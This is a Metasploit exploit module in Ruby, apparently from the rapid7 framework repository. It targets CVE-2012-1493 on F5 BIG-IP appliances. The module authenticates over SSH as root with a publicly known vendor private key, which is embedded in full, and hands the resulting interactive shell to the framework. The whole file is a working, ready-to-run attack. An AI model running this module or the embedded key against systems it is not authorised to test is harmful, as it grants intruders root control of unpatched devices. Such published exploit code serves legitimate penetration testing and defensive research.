
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
require 'rex/socket/ssh_factory'
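class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::SSH

  # Module metadata.
  #
  # The weakness is a vendor-shipped, publicly known SSH key pair
  # (CVE-2012-1493, see References): any appliance that still trusts the
  # public half for root accepts the private half embedded in #key_data.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 BIG-IP SSH Private Key Exposure',
        'Description' => %q{
          F5 ships a public/private key pair on BIG-IP appliances that allows
          passwordless authentication to any other BIG-IP box. Since the key is
          easily retrievable, an attacker can use it to gain unauthorized remote
          access as root.
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => true,
        'Targets' => [['Universal', {}]],
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Author' => ['egypt'],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt'],
          ['CVE', '2012-1493'],
          ['OSVDB', '82780'],
          ['URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell']
        ],
        'DisclosureDate' => '2012-06-11',
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # A publickey login as root is an ordinary sshd authentication event,
          # so the target's auth logging is expected to record it.
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # Helper methods that normally come from the Tcp mixin; this module only
  # includes the SSH mixin, so the datastore values are read directly.

  # @return [String] target host from the datastore
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] target port from the datastore (defaults to 22)
  def rport
    datastore['RPORT']
  end

  # Attempts a publickey SSH login as +user+ with the key from #key_data.
  #
  # Every failure mode is reported with print_error and yields nil, so the
  # caller only has to test the result for truthiness.
  #
  # @param user [String] account name to authenticate as
  # @return [Net::SSH::CommandStream, nil] an interactive stream on success,
  #   nil when the connection, negotiation or authentication fails
  def do_login(user)
    opt_hash = ssh_client_defaults.merge(
      auth_methods: ['publickey'],
      port: rport,
      key_data: [key_data]
    )
    # :debug is net/ssh's most verbose logger level; only on explicit request.
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']

    ssh_socket = nil
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
      end
    rescue Rex::ConnectionError => e
      # Reported like the other failure modes instead of being dropped silently.
      print_error "#{rhost}:#{rport} SSH - Connection failed: #{e.message}"
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      # The host no longer trusts the known key; nothing further to do.
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    return nil unless ssh_socket

    # Wrap the authenticated connection in a CommandStream; the stream now
    # owns the socket and the caller consumes its local end.
    Net::SSH::CommandStream.new(ssh_socket)
  end

  # Entry point: logs in as root and, on success, hands the stream's local
  # socket to the framework handler so a session is built from it.
  def exploit
    conn = do_login('root')
    return unless conn

    print_good 'Successful login'
    handler(conn.lsock)
  end

  # The private half of the key pair F5 shipped on BIG-IP appliances, in PEM
  # form. The squiggly heredoc strips the common indentation, so the returned
  # string holds the key exactly as net/ssh expects it.
  #
  # @return [String] PEM-encoded RSA private key
  def key_data
    <<~EOF
      -----BEGIN RSA PRIVATE KEY-----
      MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
      UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
      OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
      gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
      8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
      7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
      2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
      37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
      RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
      rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
      uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
      Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
      LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
      -----END RSA PRIVATE KEY-----
    EOF
  end
end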